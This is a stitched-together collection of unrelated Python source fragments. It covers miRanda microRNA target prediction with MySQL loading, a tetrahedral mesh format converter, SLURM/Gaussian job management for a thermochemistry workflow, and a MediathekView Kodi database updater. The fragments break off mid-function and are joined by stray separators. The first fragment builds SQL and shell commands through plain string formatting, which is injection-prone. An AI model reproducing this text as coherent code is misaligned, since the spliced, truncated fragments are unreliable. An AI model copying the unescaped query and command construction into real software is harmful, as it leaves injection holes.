if a2gSet[items[4]] > float(items[5]):
continue
a2gSet[items[4]] = float(items[5])
a2gIndex[items[4]] = k
elif items[3] == 'I2T':
if a2tSet.has_key(items[4]):
if a2tSet[items[4]] > float(items[5]):
continue
a2tSet[items[4]] = float(items[5])
a2tIndex[items[4]] = k
tmp = rawIndex.values()
tmp.extend(a2gIndex.values())
tmp.extend(a2tIndex.values())
tmp.sort()
newFile = open(miRandaOP, 'w')
for lineNum in tmp:
items = uniqueFile[lineNum].split('\t')
if len(dieT) > 0:
if items[4] in dieT and items[3] == 'RAW':
continue
newFile.write(uniqueFile[lineNum])
newFile.close()
def targetsPredictBymiRandaA2I4ML(seqs, utrs, mirnaName, position, chromosome, jobId, inactive=[], newt=[]):
#Set output files
tag = str(time.time())
miFile = path.join(getConfig("dispatch", "mpool"), "mir_"+tag+".fasta")
utrFile = path.join(getConfig("dispatch", "mpool"), "ulib_"+tag+".fasta")
outFile = path.join(getConfig("dispatch", "mpool"), "out_"+tag)
SeqIO.write(seqs, miFile, "fasta")
SeqIO.write(utrs, utrFile, "fasta")
#Run miRanda
os.system(getConfig("program", "miranda")+" "+miFile+" "+utrFile+" -out "+outFile+" -sc 60")
#Generate a signature for this editing event
sig = sigEngine.generatemiRNASig(mirnaName, position, chromosome, jobId)
parsemiRanda(outFile, sig, jobId)
res = []
uniqueTopmiRanda(outFile, newt, inactive)
new_t, old_t, com_t, dif_t = diffSetsBymiRanda(outFile, sig)
query = """LOAD DATA LOCAL INFILE '%s' INTO TABLE %s (`mirna`, `sig`, `job`, `tag`, `gene_symbol`, `score`, `energy`, `mi_start`, `mi_end`, `utr_start`, `utr_end`, `match_len`, `identity`, `similarity`, `mir_seq`, `lines`, `utr_seq`);""" % (outFile, getConfig("datasets", "mirtargets"))
cursor.execute(query)
cnx.commit()
#delete(outFile)
return new_t, old_t, com_t, dif_t, sig
def targetsPredictBymiRandaA2I(seqs, mirnaName, position, chromosome, jobId, whitelist=[]):
#Set output files
tag = str(time.time())
miFile = path.join(getConfig("dispatch", "mpool"), "mir_"+tag+".fasta")
outFile = path.join(getConfig("dispatch", "mpool"), "out_"+tag)
SeqIO.write(seqs, miFile, "fasta")
#Run miRanda
os.system(getConfig("program", "miranda")+" "+miFile+" "+getConfig("datasets", "utr3")+" -out "+outFile)
#Generate a signature for this editing event
sig = sigEngine.generatemiRNASig(mirnaName, position, chromosome, jobId)
parsemiRanda(outFile, sig, jobId)
uniqueTopmiRanda(outFile)
try:
(new_t, old_t, com_t, dif_t) = diffSetsBymiRanda(outFile, sig)
except :
return 0,0,0,0
query = """LOAD DATA LOCAL INFILE '%s' INTO TABLE %s (`mirna`, `sig`, `job`, `tag`, `way`, `gene_symbol`, `score`, `energy`, `mi_start`, `mi_end`, `utr_start`, `utr_end`, `match_len`, `identity`, `similarity`, `mir_seq`, `lines`, `utr_seq`);""" % (outFile, getConfig("datasets", "mirtargets"))
cursor.execute(query)
cnx.commit()
#clean
delete(miFile)
delete(outFile)
return (new_t, old_t, com_t, dif_t, sig)
def delete(filepath):
try:
from os import remove, path
except:
return 1
if path.isfile(filepath):
remove(filepath)
return 0
def recordMiRNAEdit(mirName, pos, chr, seed, seq, ot, nt, ct, sig, jobId):
try:
query = """INSERT INTO `mirediting` (`mirna`, `accession`, `edit_pos_raw`, `edit_pos_chr`, `event`, `role`, `sequence`, `old_t`, `new_t`, `com_t`, `sig`, `job`) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', %s);""" % (mirName, mirbase.getmiRnaAcc(mirName), pos, chr, | |
#!/usr/bin/env python
# encoding: utf-8
"""
meshconvert.py
A script to convert between tetrahedral mesh formats.
Created by <NAME> (<EMAIL>) on 2006-12-07.
"""
import sys
import getopt
import os
help_message = \
'''
meshconvert.py - a script to convert between tetrahedral mesh formats.
Usage:
meshconvert.py [-s scale] input_file output_file
input_file the input tetrahedral (or triangular surface) mesh file.
This file must be in one of the following formats:
.node - Jonathan Shewchuk's node file format.
.node files must be accompanied by a
.ele file that contains tetrahedra.
.mesh - NETGEN's tetrahedral mesh format.
.vmesh - GRUMMP's tetrahedral mesh format.
.tet - AIM@SHAPE repository's tetrahedral mesh format.
.off - A common surface mesh format. If the input file
is in .off format, only boundary triangles will
be read and available for output.
.surf - NETGEN's triangle surface mesh format. If the
input file is in .surf format, only boundary
triangles will be read and available for output.
output_file the output tetrahedral (or triangular surface) mesh file.
This file must be in one of the following formats:
.node - Jonathan Shewchuk's mesh file format.
An additional .ele file will also be
output that contains tetrahedra.
.mesh - NETGEN's tetrahedral mesh format.
.obj - A common surface mesh format. If the output
file is in .obj format, only boundary triangles
will be written to it.
.off - A common surface mesh format. If the output
file is in .off format, only boundary triangles
will be written to it.
.surf - NETGEN's triangle surface mesh format. If the output
file is in .surf format, only boundary triangles
will be written to it.
-s scale optional vertex scale argument. All vertices' geometric positions
will be multiplied by scale in the output file.
NOTE: As part of the conversion process, all tetrahedra will be adjusted to have
consistent, right-handed orientation: That is, for a tetrahedron with vertices
ordered (1, 2, 3, 4), the vertices 2, 3, 4 occur in counterclockwise order as
seen from vertex 1. If you curl the fingers of your right hand to follow the
vertices 2, 3, 4, then your thumb points toward vertex 1.
'''
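# orient3d is used throughout this script but defined elsewhere; below is a
# minimal reference sketch (a hypothetical helper, not the script's own
# implementation). It returns the 3x3 determinant of (a-d, b-d, c-d), i.e.
# six times the signed tetrahedron volume: its sign distinguishes the two
# orientations described in the NOTE above, and zero means a degenerate
# (flat) tet. A naive determinant like this is not robust to roundoff;
# production code typically uses an exact or adaptive predicate.
def _orient3d_sketch(a, b, c, d):
    ax, ay, az = a[0] - d[0], a[1] - d[1], a[2] - d[2]
    bx, by, bz = b[0] - d[0], b[1] - d[1], b[2] - d[2]
    cx, cy, cz = c[0] - d[0], c[1] - d[1], c[2] - d[2]
    return (ax * (by * cz - bz * cy)
            - ay * (bx * cz - bz * cx)
            + az * (bx * cy - by * cx))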
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def main(argv=None):
# functions for reading
readDict = {}
readDict['.node'] = readNodeEle
readDict['.mesh'] = readMesh
readDict['.vmesh'] = readVmesh
readDict['.tet'] = readTet
readDict['.surf'] = readSurfTets
readDict['.off'] = ReadOFFTets
# functions for writing
writeDict = {}
writeDict['.node'] = writeNodeEle
writeDict['.mesh'] = writeMesh
writeDict['.obj'] = writeOBJTets
writeDict['.off'] = writeOFFTets
writeDict['.surf'] = writeSurfTets
if argv is None:
argv = sys.argv
doscale = False
# if they invoke with arguments, parse them
if len(argv) > 1:
try:
try:
opts, args = getopt.getopt(argv[1:], "hs:", ["help",])
except getopt.error, msg:
raise Usage(msg)
# option processing
for option, value in opts:
if option == "-s":
doscale = True
scale = float(value)
if option in ("-h", "--help"):
print help_message
return 1
except Usage, err:
print >> sys.stderr, sys.argv[0].split("/")[-1] + ": " + str(err.msg)
print >> sys.stderr, "\t for help use --help"
return 2
else:
print help_message
return 1
if len(argv) < 3:
print "Not enough arguments. For help, use --help."
# determine the input and output formats, and check that they make sense
inFileName = argv[-2]
outFileName = argv[-1]
inFileNameBase, inType = os.path.splitext(inFileName)
outFileNameBase, outType = os.path.splitext(outFileName)
if inType not in readDict.keys():
print "Don't know how to read input format '%s'; invoke with --help for a list of supported formats." % (inType)
return 2
if outType not in writeDict.keys():
print "Don't know how to write output format '%s'; invoke with --help for a list of supported formats." % (outType)
return 2
# read the input mesh
points, tets, boundFaces = readDict[inType](inFileNameBase)
if doscale:
print "Scaling vertices by %g", scale
points = [vscale(scale, point) for point in points]
# write the output mesh
writeDict[outType](points, tets, boundFaces, outFileNameBase)
####
# Functions to READ tet mesh formats
####
def readTet(meshFileName):
"""Read .tet format... I don't actually remember who uses this"""
# append .mesh to file stem
meshFileName += '.tet'
# open input .tet file
infile = open(meshFileName)
# fetch the number of points
numpoints = int(infile.readline().split()[0])
# fetch the number of tets
numtets = int(infile.readline().split()[0])
points = []
# read in all the points
for iter in range(0,numpoints):
points.append(map(float,infile.readline().strip().split()))
tets = []
# read in the tets
for iter in range(0,numtets):
tets.append(vaddscalar(1,map(int,infile.readline().strip().split()[1:])))
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]-1]
b = points[tet[1]-1]
c = points[tet[2]-1]
d = points[tet[3]-1]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0:
print "WHOA! input zero-volume tet...\n"
if orient3d(a,b,c,d) < 0:
temp = tet[0]
tets[tetNum][0] = tet[1]
tets[tetNum][1] = temp
# this function doesn't attempt to recover boundary faces
boundFaces = []
infile.close()
return points, tets, boundFaces
def readMesh(meshFileName):
"""Read .mesh files, as output by NETGEN"""
# append .mesh to file stem
meshFileName += '.mesh'
# open input .mesh file
infile = open(meshFileName)
# fetch the number of points
numpoints = int(infile.readline())
points = []
# read in all the points
for iter in range(0,numpoints):
points.append(map(float,infile.readline().strip().split()))
# fetch the number of tets
numtets = int(infile.readline())
tets = []
# read in the tets
for iter in range(0,numtets):
tets.append(map(int,infile.readline().strip().split()[1:]))
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]-1]
b = points[tet[1]-1]
c = points[tet[2]-1]
d = points[tet[3]-1]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0:
print "WHOA! input zero-volume tet...\n"
sys.exit(1)
if orient3d(a,b,c,d) < 0:
temp = tet[0]
tets[tetNum][0] = tet[1]
tets[tetNum][1] = temp
# fetch the number of boundary faces
numfaces = int(infile.readline())
boundFaces = []
# read in the boundary faces
for iter in range(0,numfaces):
boundFaces.append(map(int,infile.readline().strip().split()[1:]))
infile.close()
# fix tets to reference points starting at 0
for index, tet in enumerate(tets):
tets[index] = vsubscalar(1,tet)
return points, tets, boundFaces
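# Layout of a .mesh file as implied by the reader above (field names are
# descriptive, not part of the format):
#   <numpoints>
#   x y z                      (numpoints lines)
#   <numtets>
#   subdomain v1 v2 v3 v4      (numtets lines; 1-based vertex ids, the
#                               leading subdomain index is skipped via [1:])
#   <numfaces>
#   boundary v1 v2 v3          (numfaces lines, same leading index)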
def readVmesh(meshFileName):
"""Read in .vmesh file... again, I can't recall who uses this format"""
# append .vmesh to file stem
meshFileName += '.vmesh'
# open input .vmesh file
infile = open(meshFileName)
# first line: #tets #faces #boundFaces #verts
firstLine = map(int,infile.readline().strip().split())
numTets = firstLine[0]
numFaces = firstLine[1]
numBoundFaces = firstLine[2]
numPoints = firstLine[3]
points = []
# read in all the points
for iter in range(0,numPoints):
points.append(map(float,infile.readline().strip().split()))
faces = []
face2tet = []
for iter in range(0,numFaces):
line = map(int,infile.readline().strip().split())
face2tet.append(line[0:2])
faces.append(line[2:])
boundFaces = []
for iter in range(0,numBoundFaces):
boundFaces.append(map(int,infile.readline().strip().split()[2:]))
boundFaces[-1][0] = boundFaces[-1][0] + 1
boundFaces[-1][1] = boundFaces[-1][1] + 1
boundFaces[-1][2] = boundFaces[-1][2] + 1
boundFaces[-1].reverse()
# one fresh list per tet; safer than [[]] * numTets, which aliases a single list
tets = [[] for _ in range(numTets)]
# reconstruct tets from face and face2tet information
# for each face
for faceNum, face in enumerate(faces):
# for each vertex in the face
for vert in face:
# for each tet that has this face
for tetNum in face2tet[faceNum]:
# if this is a legit tet index
if tetNum >= 0:
# store vertices 1-based (vert+1) to match the other readers
if vert+1 not in tets[tetNum]:
tets[tetNum] = tets[tetNum] + [vert+1]
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]-1]
b = points[tet[1]-1]
c = points[tet[2]-1]
d = points[tet[3]-1]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0:
print "WHOA! input zero-volume tet...\n"
if orient3d(a,b,c,d) < 0:
temp = tet[0]
tets[tetNum][0] = tet[1]
tets[tetNum][1] = temp
return points, tets, boundFaces
def readNodeEle(filename, computeTopo=True):
"""Read a tetrahedral mesh in .node/.ele format, <NAME> format.
The .node file specifies the vertex locations and the .ele file specifies
the tetrahedra. The .node file might start with an index of one or zero."""
points, startFromZero = ReadNode(filename)
tets = ReadEle(filename, startFromZero)
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]]
b = points[tet[1]]
c = points[tet[2]]
d = points[tet[3]]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0.0:
print "WHOA! input zero-volume tet...\n"
# repo: sevyharris/autoscience_workflow
# Functions for running a thermo job using this workflow
import pandas as pd
import os
import sys
import glob
import datetime
import time
import subprocess
import job_manager
try:
DFT_DIR = os.environ['DFT_DIR']
except KeyError:
DFT_DIR = '/work/westgroup/harris.se/autoscience/autoscience_workflow/results/dft'
def get_num_species():
"""Function to lookup number of species in the species_list.csv
"""
species_csv = os.path.join(DFT_DIR, '..', '..', 'resources', 'species_list.csv')
species_df = pd.read_csv(species_csv)
return species_df.i.values[-1]
def index2smiles(species_index):
"""Function to return species smiles given a species index
looks up the results in the species_list.csv
"""
species_csv = os.path.join(DFT_DIR, '..', '..', 'resources', 'species_list.csv')
species_df = pd.read_csv(species_csv)
species_smiles = species_df.SMILES.values[species_index]
return species_smiles
def arkane_complete(species_index):
"""Function to check whether the arkane job is complete for a species
Expects to find the following directory structure:
DFT_DIR/thermo/species_XXXX/arkane/RMG_libraries/thermo.py
Returns True if complete, False otherwise
"""
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
arkane_result = os.path.join(species_dir, 'arkane', 'RMG_libraries', 'thermo.py')
return os.path.exists(arkane_result)
def termination_status(log_file):
"""Returns:
0 for Normal termination
1 for Error termination
-1 for no termination
"""
with open(log_file, 'rb') as f:
f.seek(0, os.SEEK_END)
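# Walk backwards from EOF one line at a time: each inner while rewinds to
# the previous '\n', readline() then grabs that line, and the saved
# position is restored so the next pass steps one line further back.
# OSError fires when we rewind past the start of a short file.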
for i in range(0, 5):
try:
f.seek(-2, os.SEEK_CUR)
while f.read(1) != b'\n':
f.seek(-2, os.SEEK_CUR)
except OSError:
f.seek(0)
saved_position = f.tell()
last_line = f.readline().decode()
f.seek(saved_position, os.SEEK_SET)
if 'Normal termination' in last_line:
return 0
elif 'Error termination' in last_line:
return 1
return -1
def get_n_runs(slurm_array_file):
"""Reads the run.sh file to figure out how many conformers or rotors were meant to run
"""
with open(slurm_array_file, 'r') as f:
for line in f:
if 'SBATCH --array=' in line:
token = line.split('-')[-1]
n_runs = 1 + int(token.split('%')[0])
return n_runs
return 0
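# Example (values illustrative): a run.sh line of the form
#   #SBATCH --array=0-24%10
# yields token '24%10' after split('-'), so n_runs = 1 + 24 = 25. This is
# also why restart.sh, whose --array is a comma list like 3,7,9%10, cannot
# be parsed by this function.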
def incomplete_conformers(species_index):
"""Returns a list of indices of incomplete conformers that need to be rerun
Treats 'Error termination' as finished, just like 'Normal termination'
Parses run.sh only; does not work on restart.sh, whose --array list uses ','
"""
conformer_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}', 'conformers')
# Get #conformers from the array job script
slurm_array_file = os.path.join(conformer_dir, 'run.sh')
if not os.path.exists(slurm_array_file):
return True # no conformers run yet
n_conformers = get_n_runs(slurm_array_file)
incomplete_cfs = []
for cf_index in range(0, n_conformers):
conformer_file = os.path.join(conformer_dir, f'conformer_{cf_index:04}.log')
if not os.path.exists(conformer_file):
incomplete_cfs.append(cf_index)
continue
status = termination_status(conformer_file)
if status == -1:
incomplete_cfs.append(cf_index)
return incomplete_cfs
def incomplete_rotors(species_index):
"""Returns a list of indices of incomplete rotors that need to be rerun
Treats 'Error termination' as finished, just like 'Normal termination'
Parses run.sh only; does not work on restart.sh, whose --array list uses ','
"""
rotor_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}', 'rotors')
# Get #rotors from the array job script
slurm_array_file = os.path.join(rotor_dir, 'run.sh')
if not os.path.exists(slurm_array_file):
return True # no rotors run yet
n_rotors = get_n_runs(slurm_array_file)
incomplete_rs = []
for r_index in range(0, n_rotors):
rotor_file = os.path.join(rotor_dir, f'rotor_{r_index:04}.log')
if not os.path.exists(rotor_file):
incomplete_rs.append(r_index)
continue
status = termination_status(rotor_file)
if status == -1:
incomplete_rs.append(r_index)
return incomplete_rs
def conformers_complete(species_index):
"""Function to check whether all of the Gaussian conformer jobs have finished running.
Looks at the run.sh script to find the highest conformer index, then searches each .log file
for Normal termination
"""
if incomplete_conformers(species_index):
return False
return True
def rotors_complete(species_index):
"""Function to check whether all of the Gaussian rotor jobs have finished running.
Looks at the run.sh script to find the highest rotor index, then searches each .log file
for Normal termination
"""
if incomplete_rotors(species_index):
return False
return True
def restart_conformers(species_index):
"""Function to rerun the conformers that didn't converge in time
"""
# create a new slurm job file to run on west partition, 10 at a time, 2 week max
missing_conformers = incomplete_conformers(species_index)
missing_conformers_str = [str(i) for i in missing_conformers]
indices_str = ','.join(missing_conformers_str)
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
conformer_dir = os.path.join(species_dir, 'conformers')
# TODO put restart in the gaussian job file
slurm_run_file = os.path.join(conformer_dir, 'restart.sh')
slurm_settings = {
'--job-name': f'g16_cf_{species_index}',
'--error': 'error.log',
'--nodes': 1,
'--partition': 'west',
'--exclude': 'c5003',
'--mem': '20Gb',
'--time': '14-00:00:00',
'--cpus-per-task': 16,
'--array': f'{indices_str}%10',
}
slurm_file_writer = job_manager.SlurmJobFile(full_path=slurm_run_file)
slurm_file_writer.settings = slurm_settings
slurm_file_writer.content = [
'export GAUSS_SCRDIR=/scratch/harris.se/guassian_scratch\n',
'mkdir -p $GAUSS_SCRDIR\n',
'module load gaussian/g16\n',
'source /shared/centos7/gaussian/g16/bsd/g16.profile\n\n',
'RUN_i=$(printf "%04.0f" $(($SLURM_ARRAY_TASK_ID)))\n',
'fname="conformer_${RUN_i}.com"\n\n',
'g16 $fname\n',
]
slurm_file_writer.write_file()
# copy the file and add a restart? this is so messy, but I'm gonna do it
for cf_idx in missing_conformers:
pass
# TODO see if conditions are right to restart in Gaussian:
# chk file exists
# previous run made it at least one step in the optimization
# restart the conformers
# submit the job
start_dir = os.getcwd()
os.chdir(conformer_dir)
gaussian_conformers_job = job_manager.SlurmJob()
slurm_cmd = f"sbatch {slurm_run_file}"
gaussian_conformers_job.submit(slurm_cmd)
os.chdir(start_dir)
gaussian_conformers_job.wait_all(check_interval=600)
def restart_rotors(species_index):
"""Function to rerun the conformers that didn't converge in time
"""
# create a new slurm job file to run on west partition, 10 at a time, 2 week max
missing_rotors = incomplete_rotors(species_index)
missing_rotors_str = [str(i) for i in missing_rotors]
indices_str = ','.join(missing_rotors_str)
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
rotor_dir = os.path.join(species_dir, 'rotors')
# TODO put restart in the gaussian job file
slurm_run_file = os.path.join(rotor_dir, 'restart.sh')
slurm_settings = {
'--job-name': f'g16_rotor_{species_index}',
'--error': 'error.log',
'--nodes': 1,
'--partition': 'west',
'--exclude': 'c5003',
'--mem': '20Gb',
'--time': '14-00:00:00',
'--cpus-per-task': 16,
'--array': f'{indices_str}%10',
}
slurm_file_writer = job_manager.SlurmJobFile(full_path=slurm_run_file)
slurm_file_writer.settings = slurm_settings
slurm_file_writer.content = [
'export GAUSS_SCRDIR=/scratch/harris.se/guassian_scratch\n',
'mkdir -p $GAUSS_SCRDIR\n',
'module load gaussian/g16\n',
'source /shared/centos7/gaussian/g16/bsd/g16.profile\n\n',
'RUN_i=$(printf "%04.0f" $(($SLURM_ARRAY_TASK_ID)))\n',
'fname="rotor_${RUN_i}.com"\n\n',
'g16 $fname\n',
]
slurm_file_writer.write_file()
# submit the job
start_dir = os.getcwd()
os.chdir(rotor_dir)
gaussian_rotors_job = job_manager.SlurmJob()
slurm_cmd = f"sbatch {slurm_run_file}"
gaussian_rotors_job.submit(slurm_cmd)
os.chdir(start_dir)
gaussian_rotors_job.wait_all(check_interval=600)
def run_conformers_job(species_index):
"""Function to call snakemake rule to run conformers
This function waits until all SLURM jobs are done, so it could take days
"""
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
conformer_dir = os.path.join(species_dir, 'conformers')
os.makedirs(conformer_dir, exist_ok=True)
logfile = os.path.join(conformer_dir, 'conformers.log')
start = time.time()
timestamp = datetime.datetime.now()
with open(logfile, 'a') as f:
f.write(f'Starting conformers job: {timestamp}' + '\n')
# check if the run was already completed
if conformers_complete(species_index):
print('Conformers already ran')
with open(logfile, 'a') as f:
f.write('Conformers already ran\n')
return True
workflow_dir = os.path.join(DFT_DIR, '..', '..', 'workflow')
# start a job that calls snakemake to run conformers
os.chdir(workflow_dir)
conformer_cmd = f'snakemake -c1 species_thermo --config species_index={species_index}'
print(f'Running {conformer_cmd}')
cmd_pieces = conformer_cmd.split()
proc = subprocess.Popen(cmd_pieces)
print(proc)
# RUN HOTBIT
time.sleep(300)
g16_job_number = ''
# look for the hotbit slurm file
hotbit_slurm = glob.glob(os.path.join(species_dir, 'slurm-*'))
if len(hotbit_slurm) == 0:
print('Hotbit slurm file not found. Hotbit did not start.')
sys.exit(3)
hotbit_complete = False
while not hotbit_complete:
with open(hotbit_slurm[0], 'r') as f:
lines = f.readlines()
for line in lines:
if 'Submitted batch job' in line:
hotbit_complete = True
g16_job_number = line.split()[-1]
break
time.sleep(300) # This wait is to make sure the job is on the SLURM queue
print('Hotbit conformer screening complete')
with open(logfile, 'a') as f:
f.write('Hotbit conformer screening complete\n')
# poll every 10 minutes until the Gaussian conformer jobs finish
gaussian_job = job_manager.SlurmJob()
gaussian_job.job_id = g16_job_number
print(f'Waiting on job {gaussian_job}')
with open(logfile, 'a') as f:
f.write(f'Waiting on job {g16_job_number}' + '\n')
gaussian_job.wait_all(check_interval=600)
# rerun any conformer jobs that failed to converge in time:
if not conformers_complete(species_index):
with open(logfile, 'a') as f:
f.write('Setting up conformer restart job\n')
restart_conformers(species_index) # this waits for jobs to finish
if not conformers_complete(species_index):
with open(logfile, 'a') as f:
f.write('Conformer restart failed\n')
return False
end = time.time()
duration = end - start
print(f'Gaussian conformer jobs completed in {duration} seconds' + '\n')
with open(logfile, 'a') as f:
f.write(f'Gaussian conformer jobs completed in {duration} seconds' + '\n')
return True
def read_gaussian_energy(logfile):
with open(logfile, 'r') as f:
for line in f:
if 'Sum of electronic and zero-point Energies= ' in line:
energy = float(line.split()[-1])
return energy
return 0
def get_lowest_conformer(species_index):
"""Returns the filepath of the lowest energy conformer logfile
"""
conformer_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}', 'conformers')
slurm_array_file = os.path.join(conformer_dir, 'run.sh')
if not os.path.exists(slurm_array_file):
return None # no conformers run yet
n_conformers = get_n_runs(slurm_array_file)
lowest_energy = 999999
best_conformer_file = None
for cf_index in range(0, n_conformers):
conformer_file = os.path.join(conformer_dir, f'conformer_{cf_index:04}.log')
if not os.path.exists(conformer_file):
continue
status = termination_status(conformer_file)
if status != 0:
continue
energy = read_gaussian_energy(conformer_file)
print(cf_index, energy)
if energy < lowest_energy:
lowest_energy = energy
best_conformer_file = conformer_file
return best_conformer_file
def run_rotors_job(species_index):
# start a job that calls snakemake to run rotors
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
rotor_dir = os.path.join(species_dir, 'rotors')
os.makedirs(rotor_dir, exist_ok=True)
logfile = os.path.join(rotor_dir, 'rotors.log')
start = time.time()
timestamp = datetime.datetime.now()
with open(logfile, 'a') as f:
f.write(f'Starting rotors job: {timestamp}' + '\n')
# check if a rotor job was already completed
| |
# -*- coding: utf-8 -*-
"""
The database updater module
Copyright 2017-2019, <NAME> and <NAME>
"""
# -- Imports ------------------------------------------------
import os
import time
import datetime
import subprocess
# pylint: disable=import-error
try:
# Python 3.x
from urllib.error import URLError
except ImportError:
# Python 2.x
from urllib2 import URLError
from contextlib import closing
import ijson
import resources.lib.mvutils as mvutils
# from resources.lib.utils import *
from resources.lib.store import Store
from resources.lib.exceptions import DatabaseCorrupted
from resources.lib.exceptions import DatabaseLost
from resources.lib.exceptions import ExitRequested
# -- Unpacker support ---------------------------------------
UPD_CAN_BZ2 = False
UPD_CAN_GZ = False
try:
import bz2
UPD_CAN_BZ2 = True
except ImportError:
pass
try:
import gzip
UPD_CAN_GZ = True
except ImportError:
pass
# -- Constants ----------------------------------------------
FILMLISTE_URL = 'https://liste.mediathekview.de/'
FILMLISTE_AKT = 'Filmliste-akt'
FILMLISTE_DIF = 'Filmliste-diff'
# -- Classes ------------------------------------------------
# pylint: disable=bad-whitespace
class MediathekViewUpdater(object):
""" The database updator class """
def __init__(self, logger, notifier, settings, monitor=None):
self.logger = logger
self.notifier = notifier
self.settings = settings
self.monitor = monitor
self.database = None
self.use_xz = mvutils.find_xz() is not None
self.cycle = 0
self.add_chn = 0
self.add_shw = 0
self.add_mov = 0
self.del_chn = 0
self.del_shw = 0
self.del_mov = 0
self.tot_chn = 0
self.tot_shw = 0
self.tot_mov = 0
self.index = 0
self.count = 0
self.film = {}
def init(self, convert=False):
""" Initializes the updater """
if self.database is not None:
self.exit()
self.database = Store(self.logger, self.notifier, self.settings)
self.database.init(convert=convert)
def exit(self):
""" Resets the updater """
if self.database is not None:
self.database.exit()
del self.database
self.database = None
def reload(self):
""" Reloads the updater """
self.exit()
self.init()
def is_enabled(self):
""" Returns if the updater is enabled """
return self.settings.updenabled
def get_current_update_operation(self, force=False, full=False):
"""
Determines which update operation should be done. Returns
one of these values:
0 - no update operation pending
1 - full update
2 - differential update
Args:
force(bool, optional): if `True` the update interval
is ignored. Default is `False`
full(bool, optional): if `True` a full update
is always returned. Default is `False`
"""
if self.database is None:
# db not available - no update
self.logger.info('Update disabled since database not available')
return 0
elif self.settings.updmode == 0:
# update disabled - no update
return 0
elif self.settings.updmode == 1 or self.settings.updmode == 2:
# manual update or update on first start
if self.settings.is_update_triggered() is True:
return self._get_next_update_operation(True, False)
else:
# no update on all subsequent calls
return 0
elif self.settings.updmode == 3:
# automatic update
if self.settings.is_user_alive():
return self._get_next_update_operation(force, full)
else:
# no update if user is idle for more than 2 hours
return 0
elif self.settings.updmode == 4:
# continuous update
return self._get_next_update_operation(force, full)
def _get_next_update_operation(self, force=False, full=False):
status = self.database.get_status()
tsnow = int(time.time())
tsold = status['lastupdate']
dtnow = datetime.datetime.fromtimestamp(tsnow).date()
dtold = datetime.datetime.fromtimestamp(tsold).date()
if status['status'] == 'UNINIT':
# database not initialized - no update
self.logger.debug('database not initialized')
return 0
elif status['status'] == "UPDATING" and tsnow - tsold > 10800:
# process was probably killed during update - no update
self.logger.info(
'Stuck update pretending to run since epoch {} reset', tsold)
self.database.update_status('ABORTED')
return 0
elif status['status'] == "UPDATING":
# already updating - no update
self.logger.debug('Already updating')
return 0
elif not full and not force and tsnow - tsold < self.settings.updinterval:
# last update less than the configured update interval - no update
self.logger.debug(
'Last update less than the configured update interval. do nothing')
return 0
elif dtnow != dtold:
# last update was not today. do full update once a day
self.logger.debug(
'Last update was not today. do full update once a day')
return 1
elif status['status'] == "ABORTED" and status['fullupdate'] == 1:
# last full update was aborted - full update needed
self.logger.debug(
'Last full update was aborted - full update needed')
return 1
elif full is True:
# full update requested
self.logger.info('Full update requested')
return 1
else:
# do differential update
self.logger.debug('Do differential update')
return 2
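# Decision ladder above, summarized: UNINIT -> 0; UPDATING stuck > 3h ->
# mark ABORTED, 0; UPDATING -> 0; within updinterval (unless force/full)
# -> 0; first run of a new day -> 1; last full update ABORTED -> 1;
# full requested -> 1; otherwise differential -> 2.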
def update(self, full):
"""
Downloads the database update file and
then performs a database update
Args:
full(bool): Perform full update if `True`
"""
if self.database is None:
return
elif self.database.supports_native_update(full):
if self.get_newest_list(full):
if self.database.native_update(full):
self.cycle += 1
self.delete_list(full)
elif self.database.supports_update():
if self.get_newest_list(full):
if self.import_database(full):
self.cycle += 1
self.delete_list(full)
def import_database(self, full):
"""
Performs a database update when a
downloaded update file is available
Args:
full(bool): Perform full update if `True`
"""
(_, _, destfile, avgrecsize) = self._get_update_info(full)
if not mvutils.file_exists(destfile):
self.logger.error('File {} does not exists', destfile)
return False
# estimate number of records in update file
records = int(mvutils.file_size(destfile) / avgrecsize)
if not self.database.ft_init():
self.logger.warn(
'Failed to initialize update. Maybe a concurrency problem?')
return False
# pylint: disable=broad-except
try:
starttime = time.time()
self.logger.info(
'Starting import of approx. {} records from {}', records, destfile)
with closing(open(destfile, 'r')) as updatefile:
parser = ijson.parse(updatefile)
flsm = 0
flts = 0
(self.tot_chn, self.tot_shw, self.tot_mov) = self._update_start(full)
self.notifier.show_update_progress()
for prefix, event, value in parser:
if (prefix, event) == ("X", "start_array"):
self._init_record()
elif (prefix, event) == ("X", "end_array"):
self._end_record(records)
if self.count % 100 == 0 and self.monitor.abort_requested():
# kodi is shutting down. Close all
self._update_end(full, 'ABORTED')
self.notifier.close_update_progress()
return True
elif (prefix, event) == ("X.item", "string"):
if value is not None:
# self._add_value( value.strip().encode('utf-8') )
self._add_value(value.strip())
else:
self._add_value("")
elif (prefix, event) == ("Filmliste", "start_array"):
flsm += 1
elif (prefix, event) == ("Filmliste.item", "string"):
flsm += 1
if flsm == 2 and value is not None:
# this is the timestamp of this database update
try:
fldt = datetime.datetime.strptime(
value.strip(), "%d.%m.%Y, %H:%M")
flts = int(time.mktime(fldt.timetuple()))
self.database.update_status(filmupdate=flts)
self.logger.info(
'Filmliste dated {}', value.strip())
except TypeError:
# pylint: disable=line-too-long
# SEE: https://forum.kodi.tv/showthread.php?tid=112916&pid=1214507#pid1214507
# Wonderful. His name is also Leopold
try:
flts = int(time.mktime(time.strptime(
value.strip(), "%d.%m.%Y, %H:%M")))
self.database.update_status(
filmupdate=flts)
self.logger.info(
'Filmliste dated {}', value.strip())
